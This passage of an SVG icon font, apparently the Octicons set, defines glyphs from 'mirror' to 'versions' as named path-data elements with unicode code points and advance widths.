<glyph glyph-name="mirror" unicode="&#xf024;" d="M992 531L544 832 96 531c-19-12-32-29-32-51v-672l480 256 480-256V480c0 22-13 39-32 51z m-32-627L576 112v80h-64v-80L128-96V480L512 736v-288h64V736l384-256v-576zM384 384h320V512l192-192-192-192V256H384v-128L192 320l192 192v-128z" horiz-adv-x="1024" />
<glyph glyph-name="mortar-board" unicode="&#xf0d7;" d="M501 244l-245 76s0-96 0-160 115-96 256-96 256 32 256 96 0 160 0 160l-245-76c-7-2-15-2-23 0h1z m18 409c-4 1-9 1-13 0l-489-152c-21-7-21-36 0-43l111-35v-113c-19-11-32-32-32-55 0-12 3-23 9-32-5-9-9-20-9-32v-165c0-35 128-35 128 0v165c0 12-3 23-9 32 5 9 9 20 9 32 0 24-13 44-32 55v93l313-98c4-1 9-1 13 0l489 152c21 7 21 36 0 43l-488 153z m-6-205c-35 0-64 14-64 32s29 32 64 32 64-14 64-32-29-32-64-32z" horiz-adv-x="1024" />
<glyph glyph-name="mute" unicode="&#xf080;" d="M512 652v-664c0-43-52-64-82-34L192 192H64c-35 0-64 29-64 64V384c0 35 29 64 64 64h128l238 238c30 30 82 9 82-34z m482-206l-68 68-126-126-126 126-68-68 126-126-126-126 68-68 126 126 126-126 68 68-126 126 126 126z" horiz-adv-x="1024" />
<glyph glyph-name="no-newline" unicode="&#xf09c;" d="M1024 512v-192c0-35-29-64-64-64H768v-128L576 320l192 192v-128h128V512h128zM512 320c0-141-115-256-256-256S0 179 0 320s115 256 256 256 256-115 256-256zM96 214l266 266c-31 20-67 32-106 32-106 0-192-86-192-192 0-39 12-75 32-106z m352 106c0 39-12 75-32 106L150 160c31-20 67-32 106-32 106 0 192 86 192 192z" horiz-adv-x="1024" />
<glyph glyph-name="octoface" unicode="&#xf008;" d="M940.812 554.312c8.25 20.219 35.375 101.75-8.562 211.906 0 0-67.375 21.312-219.875-82.906C648.5 700.875 579.875 703.5 512 703.5c-67.906 0-136.438-2.625-200.5-20.25C159.031 787.531 91.719 766.219 91.719 766.219 47.812 656 74.938 574.531 83.188 554.312 31.5 498.438 0 427.125 0 339.656 0 10.437999999999988 213.25-64 510.844-64 808.562-64 1024 10.437999999999988 1024 339.656 1024 427.125 992.5 498.438 940.812 554.312zM512-1c-211.406 0-382.781 9.875-382.781 214.688 0 48.938 24.062 94.595 65.344 132.312 68.75 62.969 185.281 29.688 317.438 29.688 132.25 0 248.625 33.281 317.438-29.625 41.312-37.78 65.438-83.312 65.438-132.312C894.875 8.875 723.375-1 512-1zM351.156 319.562c-42.469 0-76.906-51.062-76.906-114.188s34.438-114.312 76.906-114.312c42.375 0 76.812 51.188 76.812 114.312S393.531 319.562 351.156 319.562zM672.875 319.562C630.5 319.562 596 268.5 596 205.375s34.5-114.312 76.875-114.312 76.812 51.188 76.812 114.312C749.75 268.5 715.312 319.562 672.875 319.562z" horiz-adv-x="1024" />
<glyph glyph-name="organization" unicode="&#xf037;" d="M304 515c35-41 86-67 144-67s109 26 144 67c22-40 64-67 112-67 71 0 128 57 128 128s-57 128-128 128c-26 0-49-8-69-21C615 768 539 832 448 832S281 768 261 683c-20 13-43 21-69 21-71 0-128-57-128-128s57-128 128-128c48 0 90 27 112 67z m333 97c13 24 38 41 67 41 42 0 77-35 77-77s-35-77-77-77-75 34-76 75c4 12 7 25 9 38zM448 769c71 0 129-58 129-129s-58-129-129-129-129 58-129 129S377 769 448 769zM192 499c-42 0-77 35-77 77s35 77 77 77c29 0 54-17 67-41 2-13 5-26 9-38-1-41-34-75-76-75z m640-51H64c-35 0-64-29-64-64v-192c0-35 29-64 64-64v-128c0-35 29-64 64-64h64c35 0 64 29 64 64v64h64v-192c0-35 29-64 64-64h128c35 0 64 29 64 64V64h64v-64c0-35 29-64 64-64h64c35 0 64 29 64 64V128c35 0 64 29 64 64V384c0 35-29 64-64 64zM192 0h-64V192H64V384h128v-384z m448 128h-64V256h-64v-384H384V256h-64v-128h-64V384h384v-256z m192 64h-64v-192h-64V384h128v-192z" horiz-adv-x="896" />
<glyph glyph-name="package" unicode="&#xf0c4;" d="M0 559v-478c0-29 19-54 48-62l416-111c10-3 22-3 32 0l416 111c29 8 48 33 48 62V559c0 29-19 54-48 62L496 732c-10 2-22 2-32 0L48 621c-29-8-48-33-48-62z m448-582L64 79V512l384-103v-432zM64 576l160 43 416-111-160-43L64 576z m832-497L512-23V409l128 35v-156l128 34V478l128 34v-433zM768 542L352 653l128 34 416-111-128-34z" horiz-adv-x="1024" />
<glyph glyph-name="paintcan" unicode="&#xf0d1;" d="M384 832C171.923 832 0 660.077 0 448v-64c0-35.346 28.654-64 64-64v-320c0-70.692 143.269-128 320-128s320 57.308 320 128V320c35.346 0 64 28.654 64 64v64C768 660.077 596.077 832 384 832zM576 192v-32c0-17.673-14.327-32-32-32s-32 14.327-32 32v32c0 17.673-14.327 32-32 32s-32-14.327-32-32v-160c0-17.673-14.327-32-32-32s-32 14.327-32 32V160c0 17.673-14.327 32-32 32s-32-14.327-32-32v-32c0-35.346-28.654-64-64-64s-64 28.654-64 64v64c-35.346 0-64 28.654-64 64V371.193C186.382 340.108 279.318 320 384 320s197.618 20.108 256 51.193V256C640 220.654 611.346 192 576 192zM384 384c-107.433 0-199.393 26.474-237.372 64 37.979 37.526 129.939 64 237.372 64s199.393-26.474 237.372-64C583.393 410.474 491.433 384 384 384zM384 576c-176.62 0-319.816-57.236-319.996-127.867-0.001 0.001-0.002 0.001-0.003 0.002C64.075 624.804 207.314 768 384 768c176.731 0 320-143.269 320-320C704 518.692 560.731 576 384 576z" horiz-adv-x="768" />
<glyph glyph-name="pencil" unicode="&#xf058;" d="M0 64v-192h192l512 512-192 192L0 64z m192-128H64V64h64v-64h64v-64z m659 595l-83-83-192 192 83 83c25 25 65 25 90 0l102-102c25-25 25-65 0-90z" horiz-adv-x="896" />
<glyph glyph-name="person" unicode="&#xf018;" d="M448 448H64c-35 0-64-29-64-64v-320h128v-192c0-35 29-64 64-64h128c35 0 64 29 64 64V64h128V384c0 35-29 64-64 64z m0-320h-64V256h-64v-384H192V256h-64v-128H64V384h384v-256z m0 512C448 746 362 832 256 832S64 746 64 640s86-192 192-192 192 86 192 192zM256 512c-71 0-128 57-128 128S185 768 256 768s128-57 128-128-57-128-128-128z" horiz-adv-x="512" />
<glyph glyph-name="pin" unicode="&#xf041;" d="M640 755v-51l32-64-288-192H141c-28 0-43-34-22-55l201-201L64-128l320 256 201-201c21-21 55-6 55 22V192l192 288 64-32h51c28 0 43 34 22 55L695 777c-21 21-55 6-55-22z" horiz-adv-x="1024" />
<glyph glyph-name="plug" unicode="&#xf0d4;" d="M960 448v64H704V640H576v-64H448c-66 0-113-52-128-128l-64-64c-106 0-192-86-192-192v-128h64V192c0 71 57 128 128 128l64-64c16-74 63-128 128-128h128v-64h128V192h256v64H704V448h256z" horiz-adv-x="1024" />
<glyph glyph-name="plus" unicode="&#xf05d;" d="M768 256H448v-320H320V256H0V384h320V704h128v-320h320v-128z" horiz-adv-x="768" />
<glyph glyph-name="primitive-dot" unicode="&#xf052;" d="M0 320c0 141 115 256 256 256s256-115 256-256-115-256-256-256S0 179 0 320z" horiz-adv-x="512" />
<glyph glyph-name="primitive-square" unicode="&#xf053;" d="M512 64H0V576h512V64z" horiz-adv-x="512" />
<glyph glyph-name="pulse" unicode="&#xf085;" d="M736 320.062L563.188 486.406 422.406 288 352 729.594 152.438 320.062H0V192h230.406L288 307.188l57.594-345.562L576 288l102.375-96H896V320.062H736z" horiz-adv-x="896" />
<glyph glyph-name="question" unicode="&#xf02c;" d="M384 192h128v-128H384V192z m256 224c0-137-128-160-128-160H384c0 35 29 64 64 64h32c18 0 32 14 32 32v64c0 18-14 32-32 32h-64c-18 0-32-14-32-32v-32H256c0 96 96 192 192 192s192-64 192-160zM448 685c201 0 365-164 365-365S649-45 448-45 83 119 83 320s164 365 365 365m0 83C201 768 0 567 0 320s201-448 448-448 448 201 448 448S695 768 448 768z" horiz-adv-x="896" />
<glyph glyph-name="quote" unicode="&#xf063;" d="M394 629C239 529 163 426 163 254c10 3 19 3 28 3 81 0 160-55 160-154 0-103-66-167-160-167C70-64 0 33 0 208 0 451 112 626 321 747l73-118z m448 0C687 529 611 426 611 254c10 3 19 3 28 3 81 0 160-55 160-154 0-103-66-167-160-167-121 0-191 97-191 272 0 243 112 418 321 539l73-118z" horiz-adv-x="896" />
<glyph glyph-name="radio-tower" unicode="&#xf030;" d="M306.838 441.261c15.868 16.306 15.868 42.731 0 59.037-20.521 21.116-30.643 48.417-30.705 76.124 0.062 27.77 10.183 55.039 30.705 76.186 15.868 16.337 15.868 42.764 0 59.069-7.934 8.184-18.272 12.275-28.706 12.275-10.371 0-20.804-4.029-28.738-12.213-36.266-37.297-54.633-86.433-54.57-135.317-0.062-48.792 18.305-97.927 54.57-135.161C265.262 424.955 290.97 424.955 306.838 441.261zM149.093 798.858c-8.121 8.309-18.68 12.463-29.3 12.463-10.558 0-21.179-4.154-29.237-12.463C30.8 737.509 0.751 656.856 0.813 576.422 0.751 496.081 30.8 415.272 90.494 353.985c16.181-16.618 42.356-16.618 58.537 0 16.118 16.587 16.118 43.513 0 60.067-43.7 44.98-65.44 103.456-65.44 162.368s21.74 117.449 65.44 162.368C165.149 755.439 165.149 782.365 149.093 798.858zM513.031 472.153c57.351 0 103.956 46.574 103.956 103.956 0 57.382-46.605 103.955-103.956 103.955-57.381 0-103.956-46.573-103.956-103.955C409.076 518.727 455.65 472.153 513.031 472.153zM933.539 798.233c-16.181 16.618-42.355 16.618-58.475 0-16.181-16.587-16.181-43.513 0-60.068 43.668-44.918 65.409-103.456 65.409-162.368 0-58.85-21.805-117.387-65.473-162.306-16.117-16.618-16.117-43.575 0.062-60.068 8.059-8.309 18.616-12.463 29.237-12.463 10.558 0 21.178 4.154 29.236 12.463 59.726 61.287 89.774 142.096 89.649 222.437C1023.313 656.138 993.264 736.947 933.539 798.233zM513.281 389.127L513.281 389.127c-26.489-0.062-53.04 6.466-77.091 19.429L235.057-127.59000000000003h95.209l54.819 63.973h255.891l53.977-63.973h95.272L589.124 408.431C565.384 395.655 539.395 389.127 513.281 389.127zM512.656 358.483L577.004 128.29999999999995H449.059L512.656 358.483zM385.086 0.3550000000000182l63.974 63.973h127.944l63.974-63.973H385.086zM717.194 710.958c-15.868-16.306-15.868-42.731 0-59.037 20.491-21.116 30.611-48.511 30.674-76.124-0.062-27.77-10.183-55.102-30.674-76.187-15.868-16.336-15.868-42.763 0-59.068 7.871-8.184 18.242-12.213 28.737-12.213 10.309 0 20.741 4.029 28.675 12.213 36.298 37.234 54.665 86.433 54.54 135.255 0.125 48.792-18.181 97.927-54.54 135.161C758.801 727.264 733.062 727.264 717.194 710.958z" horiz-adv-x="1024" />
<glyph glyph-name="repo" unicode="&#xf001;" d="M256 256h-64v64h64v-64z m0 192h-64v-64h64v64z m0 128h-64v-64h64v64z m0 128h-64v-64h64v64z m512 64v-768c0-35-29-64-64-64H384v-128l-96 96-96-96V-64H64c-35 0-64 29-64 64V768C0 803 29 832 64 832h640c35 0 64-29 64-64z m-64-640H64v-128h128v64h192v-64h320V128z m0 640H128v-576h576V768z" horiz-adv-x="768" />
<glyph glyph-name="repo-clone" unicode="&#xf04c;" d="M960 832H576v-448c0-35 29-64 64-64h64v-64h64v64h192c35 0 64 29 64 64V768c0 35-29 64-64 64zM704 384h-64v64h64v-64z m256 0H768v64h192v-64z m0 128H704V768h256v-256z m-704 0h-64v64h64v-64z m0 128h-64v64h64v-64zM128 768h384V832H64C29 832 0 803 0 768v-768c0-35 29-64 64-64h128v-128l96 96 96-96V-64h320c35 0 64 29 64 64V192H128V768z m576-640v-128H384v64H192v-64H64V128h640zM192 320h64v-64h-64v64z m64 64h-64v64h64v-64z" horiz-adv-x="1024" />
<glyph glyph-name="repo-force-push" unicode="&#xf04a;" d="M640 256H512v-448H384V256H256l144 192H256l192 256 192-256H496l144-192zM704 832H64C29 832 0 803 0 768v-768c0-35 29-64 64-64h256v64H64V128h256v64H128V768h576v-576H576v-64h128v-128H576v-64h128c35 0 64 29 64 64V768c0 35-29 64-64 64z" horiz-adv-x="768" />
<glyph glyph-name="repo-forked" unicode="&#xf002;" d="M512 768c-71 0-128-57-128-128 0-47 26-88 64-110v-82L320 320 192 448v82c38 22 64 63 64 110 0 71-57 128-128 128S0 711 0 640c0-47 26-88 64-110v-114l192-192v-114c-38-22-64-63-64-110 0-71 57-128 128-128s128 57 128 128c0 47-26 88-64 110V224l192 192V530c38 22 64 63 64 110 0 71-57 128-128 128zM128 563c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z m192-640c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z m192 640c-42 0-77 35-77 77s35 77 77 77 77-35 77-77-35-77-77-77z" horiz-adv-x="640" />
<glyph glyph-name="repo-pull" unicode="&#xf006;" d="M832 320V448H448V576h384V704l192-192-192-192zM256 704h-64v-64h64v64z m448-320h64v-384c0-35-29-64-64-64H384v-128l-96 96-96-96V-64H64c-35 0-64 29-64 64V768C0 803 29 832 64 832h640c35 0 64-29 64-64v-128h-64V768H128v-576h576V384z m0-256H64v-128h128v64h192v-64h320V128zM256 448h-64v-64h64v64z m0 128h-64v-64h64v64z m-64-320h64v64h-64v-64z" horiz-adv-x="1024" />
<glyph glyph-name="repo-push" unicode="&#xf005;" d="M256 640h-64v64h64v-64z m-64-128h64v64h-64v-64z m256 0L256 256h128v-448h128V256h128L448 512zM704 832H64C29 832 0 803 0 768v-768c0-35 29-64 64-64h256v64H64V128h256v64H128V768h577l-1-576H576v-64h128v-128H576v-64h128c35 0 64 29 64 64V768c0 35-29 64-64 64z" horiz-adv-x="768" />
<glyph glyph-name="rocket" unicode="&#xf033;" d="M1024 832s-6-24-19-68c-13-45-35-101-68-170-45 5-81 21-106 46s-40 60-45 105c69 33 125 56 169 69 45 13 69 18 69 18zM779 587c-17 17-30 35-40 56-10 20-17 42-22 65-37-21-74-45-111-72-37-28-73-60-108-95-45-45-85-116-114-157H192L0 192h192l128 128c-22-49-65-191-64-192l64-64c1-1 143 41 192 64L384 0v-192l192 192V192c41 29 112 70 157 114 35 35 67 72 94 109 28 37 52 74 73 110-23 5-45 12-66 22-20 10-38 23-55 40z" horiz-adv-x="1024" />
<glyph glyph-name="rss" unicode="&#xf034;" d="M128 0H0V128c71 0 128-57 128-128zM0 640v-64c318 0 576-258 576-576h64c0 353-287 640-640 640z m0-256v-64c176 0 320-144 320-320h64c0 212-172 384-384 384z" horiz-adv-x="640" />
<glyph glyph-name="ruby" unicode="&#xf047;" d="M832 448L512 128V576h192l128-128z m192 0L512-64 0 448l256 256h512l256-256zM512 32l416 416-192 192H288L96 448l416-416z" horiz-adv-x="1024" />
<glyph glyph-name="search" unicode="&#xf02e;" d="M1005-83L761 162c45 63 71 139 71 222 0 212-172 384-384 384S64 596 64 384s172-384 384-384c83 0 159 26 222 71l245-244c12-13 29-19 45-19s33 6 45 19c25 25 25 65 0 90zM448 83c-166 0-301 135-301 301s135 301 301 301 301-135 301-301-135-301-301-301z" horiz-adv-x="1024" />
<glyph glyph-name="server" unicode="&#xf097;" d="M704 448H64c-35 0-64-29-64-64v-128c0-35 29-64 64-64h640c35 0 64 29 64 64V384c0 35-29 64-64 64zM128 256H64V384h64v-128z m128 0h-64V384h64v-128z m128 0h-64V384h64v-128z m128 0h-64V384h64v-128zM704 768H64C29 768 0 739 0 704v-128c0-35 29-64 64-64h640c35 0 64 29 64 64V704c0 35-29 64-64 64zM128 576H64V704h64v-128z m128 0h-64V704h64v-128z m128 0h-64V704h64v-128z m128 0h-64V704h64v-128z m192 64h-64v64h64v-64z m0-512H64c-35 0-64-29-64-64v-128c0-35 29-64 64-64h640c35 0 64 29 64 64V64c0 35-29 64-64 64zM128-64H64V64h64v-128z m128 0h-64V64h64v-128z m128 0h-64V64h64v-128z m128 0h-64V64h64v-128z" horiz-adv-x="768" />
<glyph glyph-name="settings" unicode="&#xf07c;" d="M192 384h-64V704h64v-320z m-64-448h64V128h-64v-192z m320 0h64V320h-64v-384z m320 0h64V64h-64v-128z m64 768h-64v-384h64V704z m-320 0h-64v-128h64V704zM256 320H64c-35 0-64-29-64-64s29-64 64-64h192c35 0 64 29 64 64s-29 64-64 64z m320 192H384c-35 0-64-29-64-64s29-64 64-64h192c35 0 64 29 64 64s-29 64-64 64z m320-256H704c-35 0-64-29-64-64s29-64 64-64h192c35 0 64 29 64 64s-29 64-64 64z" horiz-adv-x="1024" />
<glyph glyph-name="shield" unicode="&#xf0e1;" d="M448 832L0 704v-385c0-299 340-511 448-511s448 212 448 511V704L448 832zM320 128l73 179c3 15-4 30-16 38-36 23-57 61-57 103 0 70 57 128 127 128 69 0 129-58 129-128 0-42-21-80-57-103-12-8-19-23-16-38l73-179H320z" horiz-adv-x="896" />
<glyph glyph-name="sign-in" unicode="&#xf036;" d="M384 400v-336h256V320h64v-256c0-35-29-64-64-64H384v-192L35-18c-21 11-35 33-35 58V768C0 803 29 832 64 832h576c35 0 64-29 64-64v-192h-64V768H128l256-128v-144l192 144v-128h256v-128H576v-128L384 400z" horiz-adv-x="896" />
<glyph glyph-name="sign-out" unicode="&#xf032;" d="M768 256V384H512V512h256V640l256-192-256-192zM640 64H384V640L128 768h512v-192h64V768c0 35-29 64-64 64H64C29 832 0 803 0 768v-728c0-25 14-47 35-58l349-174V0h256c35 0 64 29 64 64V320h-64v-256z" horiz-adv-x="1024" />
<glyph glyph-name="smiley" unicode="&#xf0e7;" d="M512 832C229 832 0 603 0 320s229-512 512-512 512 229 512 512S795 832 512 832z m308-820c-40-40-87-71-139-93-53-23-110-34-169-34s-116 11-169 34c-52 22-99 53-139 93s-71 87-93 139c-23 53-34 110-34 169s11 116 34 169c22 52 53 99 93 139s87 71 139 93c53 23 110 34 169 34s116-11 169-34c52-22 99-53 139-93s71-87 93-139c23-53 34-110 34-169s-11-116-34-169c-22-52-53-99-93-139zM256 461v38c0 42 34 76 77 76h38c42 0 76-34 76-76v-38c0-43-34-77-76-77h-38c-43 0-77 34-77 77z m320 0v38c0 42 34 76 77 76h38c42 0 76-34 76-76v-38c0-43-34-77-76-77h-38c-43 0-77 34-77 77z m256-269c-46-120-186-192-320-192s-274 72-320 192c-9 25 15 64 42 64h550c26 0 57-39 48-64z" horiz-adv-x="1024" />
<glyph glyph-name="squirrel" unicode="&#xf0b2;" d="M768 768c-141.385 0-256-83.75-256-186.875C512 457.25 544 387 512 192c0 288-177 405.783-256 405.783 3.266 32.17-30.955 42.217-30.955 42.217s-14-7.124-19.354-21.583c-17.231 20.053-36.154 17.54-36.154 17.54l-8.491-37.081c0 0-117.045-40.876-118.635-206.292C56 371 141.311 353.898 201.887 364.882c57.157-2.956 42.991-50.648 30.193-63.446C178.083 247.438 128 320 64 320s-64-64 0-64 64-64 192-64c-198-77 0-256 0-256h-64c-64 0-64-64-64-64s256 0 384 0c192 0 320 64 320 222.182 0 54.34-27.699 114.629-64 162.228C697.057 349.433 782.453 427.566 832 384s192-64 192 128C1024 653.385 909.385 768 768 768zM160 448c-17.674 0-32 14.327-32 32 0 17.674 14.326 32 32 32 17.673 0 32-14.326 32-32C192 462.327 177.673 448 160 448z" horiz-adv-x="1024" />
<glyph glyph-name="star" unicode="&#xf02a;" d="M896 448l-313.5 40.781L448 768 313.469 488.781 0 448l230.469-208.875L171-63.93799999999999l277 148.812 277.062-148.812L665.5 239.125 896 448z" horiz-adv-x="896" />
<glyph glyph-name="stop" unicode="&#xf08f;" d="M640 768H256L0 512v-384l256-256h384l256 256V512L640 768z m192-608L608-64H288L64 160V480l224 224h320l224-224v-320zM384 576h128v-320H384V576z m0-384h128v-128H384V192z" horiz-adv-x="896" />
<glyph glyph-name="sync" unicode="&#xf087;" d="M655.461 358.531c11.875-81.719-13.062-167.781-76.812-230.594-94.188-92.938-239.5-104.375-346.375-34.562l74.875 73L31.96 204.75 70.367-64l84.031 80.5c150.907-111.25 364.938-100.75 502.063 34.562 79.5 78.438 115.75 182.562 111.25 285.312L655.461 358.531zM189.46 511.938c94.156 92.938 239.438 104.438 346.313 34.562l-75-72.969 275.188-38.406L697.586 704l-83.938-80.688C462.711 734.656 248.742 724.031 111.585 588.75 32.085 510.344-4.133 406.219 0.335 303.5l112.25-22.125C100.71 363.125 125.71 449.094 189.46 511.938z" horiz-adv-x="768.051" />
<glyph glyph-name="tag" unicode="&#xf015;" d="M431 657c-30 30-71 47-113 47H160C72 704 0 632 0 544v-158c0-42 17-83 47-113l388-388c25-25 65-25 90 0l294 294c25 25 25 65 0 90L431 657zM88 314c-20 19-30 45-30 72V544c0 56 46 102 102 102h158c27 0 53-10 72-30l393-392-303-303L88 314z m40 262h128v-128H128V576z" horiz-adv-x="896" />
<glyph glyph-name="tasklist" unicode="&#xf0e5;" d="M986 256H486c-38 0-38 26-38 64s0 64 38 64h500c38 0 38-26 38-64s0-64-38-64zM614 576c-38 0-38 26-38 64s0 64 38 64h372c38 0 38-26 38-64s0-64-38-64H614zM0 582l90 83 102-102L454 832l90-90-352-352L0 582z m486-518h500c38 0 38-26 38-64s0-64-38-64H486c-38 0-38 26-38 64s0 64 38 64z" horiz-adv-x="1024" />
<glyph glyph-name="telescope" unicode="&#xf088;" d="M512 256l192-384h-64L512 128v-320h-64V192L320-128h-64l128 320 128 64zM448 832h-64v-64h64V832zM320 640h-64v-64h64v64zM128 768H64v-64h64V768zM40 256c-14-10-18-28-10-43l35-59c8-15 26-20 41-13l89 42-74 128-81-55z m505 345L174 348l79-137 405 194-113 196z m270-82l-94 161c-9 16-30 21-46 11l-77-53 118-205 85 41c17 8 23 28 14 45z" horiz-adv-x="896" />
<glyph glyph-name="terminal" unicode="&#xf0c8;" d="M448 192h256v-64H448v64z m-192-64l192 192-192 192-48-48 144-144-144-144 48-48z m640 512v-640c0-35-29-64-64-64H64c-35 0-64 29-64 64V640c0 35 29 64 64 64h768c35 0 64-29 64-64z m-64 0H64v-640h768V640z" horiz-adv-x="896" />
<glyph glyph-name="text-size" unicode="&#xf0e3;" d="M1150-64h-144l-61 208H685l-61-208H480l-44 149H226l-45-149H42l211 614h160l139-406 185 560h161l252-768zM407 184s-65 231-75 263h-5l-72-263h152z m507 67l-97 347h-4l-96-347h197z" horiz-adv-x="1152" />
<glyph glyph-name="three-bars" unicode="&#xf05e;" d="M730 256H38c-38 0-38 26-38 64s0 64 38 64h692c38 0 38-26 38-64s0-64-38-64z m0 256H38c-38 0-38 26-38 64s0 64 38 64h692c38 0 38-26 38-64s0-64-38-64zM38 128h692c38 0 38-26 38-64s0-64-38-64H38c-38 0-38 26-38 64s0 64 38 64z" horiz-adv-x="768" />
<glyph glyph-name="thumbsdown" unicode="&#xf0db;" d="M1023 331l-62 381C950 800 840 832 768 832H364c-13 0-24-3-34-9l-92-55H128C60 768 0 708 0 640v-256c0-68 60-129 128-128h128c58 0 89-29 153-99 58-64 56-115 40-209-5-32 4-64 27-91 25-30 63-49 100-49 117 0 192 238 192 321l-1 63c1 0 1 0 1 0h129c74 0 125 51 127 126 0 4 1 8-1 13z m-126-76H769c-45 0-66-18-66-62l2-66c0-81-75-256-128-256-32 0-69 32-64 64 16 101 22 178-57 265-65 72-113 120-200 120V704l107 64h405c47 0 125-20 128-64l1-1 64-384c-2-41-24-64-64-64z" horiz-adv-x="1024" />
<glyph glyph-name="thumbsup" unicode="&#xf0da;" d="M896 448H768s0 0-1 0l1 63c0 83-75 321-192 321-37 0-75-19-100-49-23-26-32-58-27-90 16-95 18-146-40-210-64-70-95-99-153-99H128C60 384 0 324 0 256v-256c0-68 60-128 128-128h110l92-55c10-6 21-9 33-9h405c72 0 182 32 192 120l63 381c1 5 1 9 1 13-2 75-54 126-128 126z m0-512c-3-44-81-64-128-64H363l-107 64V320c87 0 135 48 200 120 79 87 73 164 56 264-5 32 32 64 64 64 53 0 128-175 128-256l-1-66c0-44 21-62 65-62h128c40 0 63-23 64-64l-64-384z" horiz-adv-x="1024" />
<glyph glyph-name="tools" unicode="&#xf031;" d="M286.547 366.984c16.843-16.812 81.716-85.279 81.716-85.279l35.968 37.093-56.373 58.248L456.072 491.98c0 0-48.842 47.623-27.468 28.655 20.438 75.903 1.812 160.589-55.842 220.243C315.608 800.064 234.392 819.47 161.425 799.096l123.653-127.715-32.53-125.309-121.06-33.438L7.898 640.3820000000001c-19.718-75.436-0.969-159.339 56.311-218.556C124.302 359.703 210.83 341.453 286.547 366.984zM698.815 242.769L549.694 95.46100000000001l245.932-254.805c20.062-20.812 46.498-31.188 72.872-31.188 26.25 0 52.624 10.375 72.811 31.188 40.249 41.624 40.249 108.997 0 150.62L698.815 242.769zM1023.681 670.162L867.06 832.001 405.387 354.703l56.373-58.248L185.425 10.839000000000055l-63.154-33.749-89.217-145.559 22.719-23.562 140.839 92.247 32.655 65.312 276.336 285.554 56.404-58.248L1023.681 670.162z" horiz-adv-x="1024" />
<glyph glyph-name="trashcan" unicode="&#xf0d0;" d="M640 704H512c0 35-29 64-64 64H256c-35 0-64-29-64-64H64c-35 0-64-29-64-64v-64c0-35 29-64 64-64v-576c0-35 29-64 64-64h448c35 0 64 29 64 64V512c35 0 64 29 64 64v64c0 35-29 64-64 64z m-64-768H128V512h64v-512h64V512h64v-512h64V512h64v-512h64V512h64v-576z m64 640H64v64h576v-64z" horiz-adv-x="768" />
<glyph glyph-name="triangle-down" unicode="&#xf05b;" d="M0 512l384-384 384 384H0z" horiz-adv-x="768" />
<glyph glyph-name="triangle-left" unicode="&#xf044;" d="M384 704L0 320l384-384V704z" horiz-adv-x="384" />
<glyph glyph-name="triangle-right" unicode="&#xf05a;" d="M0-64l384 384L0 704v-768z" horiz-adv-x="384" />
<glyph glyph-name="triangle-up" unicode="&#xf0aa;" d="M768 128L384 512 0 128h768z" horiz-adv-x="768" />
<glyph glyph-name="unfold" unicode="&#xf039;" d="M736 288l160-160c0-35-29-64-64-64H576v64h224L672 256H224L96 128h224v-64H64c-35 0-64 29-64 64l160 160L0 448c0 35 29 64 64 64h256v-64H96l128-128h448l128 128H576v64h256c35 0 64-29 64-64L736 288z m-352 96h128V576h128L448 768 256 576h128v-192z m128-192H384v-192H256l192-192 192 192H512V192z" horiz-adv-x="896" />
<glyph glyph-name="unmute" unicode="&#xf0ba;" d="M704 319c0-70-29-134-75-181l-43 43c35 36 57 84 57 138s-22 103-57 138l43 43c46-46 75-110 75-181zM430 686L192 448H64c-35 0-64-29-64-64v-128c0-35 29-64 64-64h128l238-238c30-30 82-9 82 34V652c0 43-52 64-82 34z m380-5l-43-43c82-82 132-194 132-319 0-124-50-237-132-319l43-43c93 93 150 221 150 362 0 142-57 270-150 362z m-90-90l-44-43c59-59 95-140 95-229s-36-170-95-228l44-43c69 69 112 165 112 271s-43 202-112 272z" horiz-adv-x="1024" />
<glyph glyph-name="unverified" unicode="&#xf0e8;" d="M1003 380l-69 86c-11 14-18 31-20 49l-12 109c-5 45-40 80-85 85l-109 12c-19 2-36 10-50 21l-86 69c-35 28-85 28-120 0l-86-69c-14-11-31-18-49-20l-109-12c-45-5-80-40-85-85l-12-109c-2-19-10-36-21-50l-69-86c-28-35-28-85 0-120l69-86c11-14 18-31 20-49l12-109c5-45 40-80 85-85l109-12c19-2 36-10 50-21l86-69c35-28 85-28 120 0l86 69c14 11 31 18 49 20l109 12c45 5 80 40 85 85l12 109c2 19 10 36 21 50l69 86c28 35 28 85 0 120zM576 96c0-18-14-32-32-32h-64c-17 0-32 14-32 32v64c0 18 15 32 32 32h64c18 0 32-14 32-32v-64z m100 313c-4-11-11-21-19-30-8-10-9-12-21-24-10-11-20-19-33-29-7-6-13-12-18-17s-9-11-12-17-5-12-7-19-2-8-2-16H456c0 14 0 20 2 31 2 12 5 23 9 33 4 9 9 18 16 27 7 8 15 16 26 24 17 12 23 19 31 33s13 24 13 38c0 17-4 29-13 37-8 8-20 12-37 12-6 0-12-1-19-3s-11-6-16-10-9-7-13-13-6-9-6-18H321c0 24 8 36 17 53 10 17 23 32 39 43s35 19 56 24 45 8 70 8c28 0 53-3 75-8 22-6 40-14 56-25 15-11 26-24 35-40 8-16 12-35 12-56 0-14 0-27-5-38z" horiz-adv-x="1024" />
<glyph glyph-name="verified" unicode="&#xf0e6;" d="M1003 380l-69 86c-11 14-18 31-20 49l-12 109c-5 45-40 80-85 85l-109 12c-19 2-36 10-50 21l-86 69c-35 28-85 28-120 0l-86-69c-14-11-31-18-49-20l-109-12c-45-5-80-40-85-85l-12-109c-2-19-10-36-21-50l-69-86c-28-35-28-85 0-120l69-86c11-14 18-31 20-49l12-109c5-45 40-80 85-85l109-12c19-2 36-10 50-21l86-69c35-28 85-28 120 0l86 69c14 11 31 18 49 20l109 12c45 5 80 40 85 85l12 109c2 19 10 36 21 50l69 86c28 35 28 85 0 120zM416 64L192 288l96 96 128-128 320 320 96-99-416-413z" horiz-adv-x="1024" />
<glyph glyph-name="versions" unicode="&#xf064;" d="M832 640H448c-35 0-64-29-64-64v-512c0-35 29-64 64-64h384c35 0 64 29 64 64V576c0 35-29 64-64 64z m-64-512H512V512h256v-384zM256 576h64v-64h-64v-384h64v-64h-64c-35 0-64 29-64 64V512c0 35 29 64 64 64zM64 512h64v-64H64v-256h64v-64H64c-35 0-64 29-64 64V448c0 35 29 64 64 64z" horiz-adv-x="896" />
